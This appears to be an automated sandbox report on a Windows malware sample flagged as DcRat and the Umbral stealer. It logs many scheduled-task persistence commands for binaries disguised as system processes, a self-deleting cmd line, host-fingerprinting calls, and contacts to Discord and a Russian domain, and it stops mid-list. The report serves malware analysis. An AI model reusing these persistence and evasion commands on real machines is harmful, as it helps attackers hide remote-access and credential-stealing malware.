schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Reviewwinbrokernet\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Reviewwinbrokernet\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Reviewwinbrokernet\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Reviewwinbrokernet\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Reviewwinbrokernet\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Reviewwinbrokernet\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgefontb" /sc MINUTE /mo 9 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\bridgefont.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgefont" /sc ONLOGON /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\bridgefont.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgefontb" /sc MINUTE /mo 11 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\bridgefont.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Windows\es-ES\Idle.exe'" /f

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\es-ES\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Windows\es-ES\Idle.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\B0q4LGMmrb.bat"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Reviewwinbrokernet\csrss.exe

"C:\Reviewwinbrokernet\csrss.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 a0996805.xsph.ru udp
RU 141.8.192.103:80 a0996805.xsph.ru tcp

Files

\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe

MD5 26abb9e459e5976f658ce80d6433f1b1
SHA1 3c8f02c1cf7b8ae82be3deea4b360497f6fee1c3
SHA256 60cc77b5d4210cef0a9032908b179142f212155426fdae48055c5f72811f7a12
SHA512 c2c02aa1db8036c7309100bb683ec7708fedfb129d763d86e03d9d6adc3688423ec04cb5b596eaf99300787f90d641e53350e1ceed0e8b11d6f29333e04b4ce8

memory/1640-10-0x0000000000400000-0x000000000040A000-memory.dmp

\Users\Admin\AppData\Local\Temp\Umbral.exe

MD5 ec2aed743841885a579338921df5073b
SHA1 8167b69da03e79cc4d013f2b1e2c972a9fa15296
SHA256 f3742ed689ca175bd615de562301102cd1bb72f65b3af8660883d5ea31bada2b
SHA512 aa4430171bd657439957cd5f3da3babf43725fce801c46377d003cd2f019bbb145eaef5de84e87f8bbf81a679733923ae3c5ff54f55e31cb575e13a4073ccc7c

\Users\Admin\AppData\Local\Temp\8XChecker.exe

MD5 562a032b64898a5f86890120f1a6872b
SHA1 2a96ddcf1fc64ec4ab23597cbfce61bed40dd27a
SHA256 bb99ec3195fb0a972271667234885e97ff017df9cc64e605f2d5aafb469bd2a3
SHA512 871fe5fa1da1df87e909e1f9b1276e9d6a1dcaa0e5da7ed5d2df338f12c1b3ac02442ebd65138cbf7a0eb4b6e9237e806fe844f6dd15e352669fdc50cfa8960b

memory/2468-21-0x0000000000400000-0x0000000000562000-memory.dmp

memory/1736-24-0x0000000000D90000-0x0000000000DD0000-memory.dmp

C:\Reviewwinbrokernet\86Wn4vQvMoqlspy5.vbe

MD5 d0546d4e82d204a215d2202b8122bebf
SHA1 b4b1c33b5104d1d003670c341908a01cc0a4a09b
SHA256 6f1ff6622e86a07eeb4c514424e78f7a9272ba7922de6dcf1df7810f40ab6756
SHA512 91d46ca23a26764f516ae273ae54cf689f303e772e954696e7e0ee7794b9b664be0aa2f432f34822b23657fb2c8bc489650f5b4d36e9b8de3d96a6ab864b9925

memory/2508-37-0x000000001B640000-0x000000001B922000-memory.dmp

memory/2508-38-0x0000000002A60000-0x0000000002A68000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9f86159ae4d125d2a7f100300010fe72
SHA1 a6ef0643996e4c97112849167647ea79d1eecc84
SHA256 32a0580101c3f39ed5020bd019f41a07d4dc4b2576d7f8a98806e954ddd651ef
SHA512 3ae22ef6402b6f0e99aa699001b26e99a7ad3ecd80e0e29bfa5589d2bc60692a5ecf821c0e2f9ddc79452a1783923d2ba03f3e99b55b80d0f3224a3bf0ab1976

memory/2992-44-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/2992-45-0x0000000000300000-0x0000000000308000-memory.dmp

C:\Reviewwinbrokernet\NckHnt5ezZ5X7x5KKKZDHVFQBsAwD.bat

MD5 5ca65390126e266243ff3881f9cfb3f2
SHA1 228f50250b0cff6894fcc595c1dc1cbcdfd1b4b6
SHA256 ce08fb9623e455e0fd404378ec059c61cbf2c9de162f49c6cf59d244e0cdca54
SHA512 4f211680121ea9ce99c9dfa78de84b2d149902a94eda40d88e7e3cc0c2ba1910be157a84cadc4cc6bf36fbcc20f050f0766a30e9bc1481c93a2c45e6b7b7c47b

\Reviewwinbrokernet\bridgefont.exe

MD5 b5c2e9124dfa9d37f7b2032b94127a37
SHA1 3f162c1dff58ff017d4a95540a220b7355765eb6
SHA256 15f729a2209101f7c6ecdaea74121dff0aec9fc1cb6bf3c6a30094af95bc5876
SHA512 edfbf86105464cc2cd214ec7da355f120d1913179855270d0a286bab67bc6c354151dc209a1f1e25ad777b523250ed2f1307e4c5e61434038a488f875c921b46

memory/2020-53-0x00000000002A0000-0x0000000000376000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1772-62-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/1772-65-0x0000000002810000-0x0000000002818000-memory.dmp

memory/1748-75-0x000000001B6B0000-0x000000001B992000-memory.dmp

memory/1748-78-0x0000000001E80000-0x0000000001E88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B0q4LGMmrb.bat

MD5 8c9823789ef6bed94dc6f045520a40a9
SHA1 eef28100e703e77d36ba1b728519d7ad7d7cb4b4
SHA256 48269edd55a44b52ed4311dc05a630120ae63db6e71813883098265526e5d9cf
SHA512 882ca56757be48411a6fb24d0a9002ae455fbd081bffa8b1da78513fefc4e5ffdbed4626b631059f620146809604555a1402bfca34a0855f6d227f6a6c28198a

memory/316-114-0x000000001B650000-0x000000001B932000-memory.dmp

memory/316-115-0x0000000001E20000-0x0000000001E28000-memory.dmp

memory/2172-122-0x0000000000E20000-0x0000000000EF6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-27 00:11

Reported

2024-06-27 00:14

Platform

win10v2004-20240226-en

Max time kernel

135s

Max time network

173s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe"

Signatures

DcRat

rat infostealer dcrat

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8XChecker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Reviewwinbrokernet\bridgefont.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows NT\Accessories\en-US\886983d96e3d3e C:\Reviewwinbrokernet\bridgefont.exe N/A
File created C:\Program Files (x86)\Windows Media Player\Icons\Umbral.exe C:\Reviewwinbrokernet\bridgefont.exe N/A
File created C:\Program Files\Windows Media Player\Visualizations\dllhost.exe C:\Reviewwinbrokernet\bridgefont.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Visualizations\dllhost.exe C:\Reviewwinbrokernet\bridgefont.exe N/A
File created C:\Program Files\Windows Media Player\Visualizations\5940a34987c991 C:\Reviewwinbrokernet\bridgefont.exe N/A
File created C:\Program Files (x86)\Windows NT\Accessories\en-US\csrss.exe C:\Reviewwinbrokernet\bridgefont.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\sihost.exe C:\Reviewwinbrokernet\bridgefont.exe N/A
File created C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\66fc9ff0ee96c2 C:\Reviewwinbrokernet\bridgefont.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\8XChecker.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
Token: SeDebugPrivilege N/A C:\Reviewwinbrokernet\bridgefont.exe N/A
Token: SeDebugPrivilege N/A C:\Reviewwinbrokernet\services.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1820 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe
PID 1820 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe
PID 1820 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe
PID 1820 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 1820 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 1820 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\8XChecker.exe
PID 1820 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\8XChecker.exe
PID 1820 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe C:\Users\Admin\AppData\Local\Temp\8XChecker.exe
PID 452 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\8XChecker.exe C:\Windows\SysWOW64\WScript.exe
PID 452 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\8XChecker.exe C:\Windows\SysWOW64\WScript.exe
PID 452 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\8XChecker.exe C:\Windows\SysWOW64\WScript.exe
PID 2716 wrote to memory of 3364 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 3364 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 3364 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3364 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Reviewwinbrokernet\bridgefont.exe
PID 3364 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Reviewwinbrokernet\bridgefont.exe
PID 4596 wrote to memory of 1500 N/A C:\Reviewwinbrokernet\bridgefont.exe C:\Reviewwinbrokernet\services.exe
PID 4596 wrote to memory of 1500 N/A C:\Reviewwinbrokernet\bridgefont.exe C:\Reviewwinbrokernet\services.exe
PID 3712 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 3712 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe

"C:\Users\Admin\AppData\Local\Temp\2bdf60ce1391ccc1a829a41c8b531dd5.exe"

C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe

"C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe"

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Users\Admin\AppData\Local\Temp\8XChecker.exe

"C:\Users\Admin\AppData\Local\Temp\8XChecker.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3808 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Reviewwinbrokernet\86Wn4vQvMoqlspy5.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Reviewwinbrokernet\NckHnt5ezZ5X7x5KKKZDHVFQBsAwD.bat" "

C:\Reviewwinbrokernet\bridgefont.exe

"C:\Reviewwinbrokernet\bridgefont.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Media Player\Visualizations\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Visualizations\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Media Player\Visualizations\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Reviewwinbrokernet\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Reviewwinbrokernet\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Reviewwinbrokernet\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Reviewwinbrokernet\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Reviewwinbrokernet\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Reviewwinbrokernet\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\odt\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\odt\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\odt\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

